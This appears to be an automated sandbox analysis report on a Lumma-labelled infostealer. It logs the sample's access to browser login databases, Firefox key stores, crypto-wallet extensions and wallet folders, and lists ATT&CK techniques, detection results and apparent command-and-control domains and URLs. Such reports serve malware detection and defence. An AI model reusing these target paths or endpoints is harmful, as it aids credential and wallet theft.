Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: Yara matchFile source: 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ji2xlo1f.exe PID: 4176, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: ji2xlo1f.exe PID: 4176, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Tactic                 Techniques (number in parentheses = count shown in the matrix cell)
Reconnaissance         Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development   Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access         Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution              Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd
Persistence            DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation   DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion        Virtualization/Sandbox Evasion (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing
Credential Access      OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery              Security Software Discovery (221); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (122)
Lateral Movement       Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection             Data from Local System (31); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control    Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels
Exfiltration           Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact                 Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label | Link
ji2xlo1f.exe | 50% | ReversingLabs | Win32.Trojan.Lumma
ji2xlo1f.exe | 100% | Avira | HEUR/AGEN.1313948
ji2xlo1f.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://lev-tolstoi.com/apijson | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/Akys | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/n# | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com:443/apical | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/r | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/apiic | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/qWU0rNf# | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/e | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/a | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/v# | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/rsF# | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/apiN# | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/apix | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com:443/api2 | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/apim | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | - | high
steamcommunity.com | 23.55.153.106 | true | false | - | high
lev-tolstoi.com | 104.21.66.86 | true | false | - | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | - | high
nightybinybz.shop | unknown | unknown | true | - | unknown
moutheventushz.shop | unknown | unknown | true | - | unknown
standartedby.shop | unknown | unknown | true | - | unknown
terracedjz.cyou | unknown | unknown | false | - | high
respectabosiz.shop | unknown | unknown | true | - | unknown
conceszustyb.shop | unknown | unknown | true | - | unknown
bakedstusteeb.shop | unknown | unknown | false | - | high
mutterissuen.shop | unknown | unknown | true | - | unknown
worddosofrm.shop | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
nightybinybz.shop | false | - | high
moutheventushz.shop | false | - | high
https://steamcommunity.com/profiles/76561199724331900 | false | - | high
standartedby.shop | false | - | high
https://lev-tolstoi.com/api | false | - | high
bakedstusteeb.shop | false | - | high
respectabosiz.shop | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://player.vimeo.com | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://steamcommunity.com/?subsection=broadcasts | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/apiic | ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com/r | ji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483290597.00000000016F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.gstatic.cn/recaptcha/ | ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/apijson | ji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com:443/apical | ji2xlo1f.exe, 00000001.00000003.2571494048.00000000016E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.valvesoftware.com/legal.htm | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.youtube.com | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://s.ytimg.com; | ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/e | ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english& | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/ | ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://steam.tv/ | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/a | ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/v# | ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com/ | ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2491194547.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://store.steampowered.com/privacy_agreement/ | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://store.steampowered.com/points/shop/ | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/qWU0rNf# | ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://lev-tolstoi.com/Akys | ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://sketchfab.com | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://lv.queniujq.cn | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://steamcommunity.com/profiles/76561199724331900/inventory/ | ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.youtube.com/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://store.steampowered.com/privacy_agreement/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
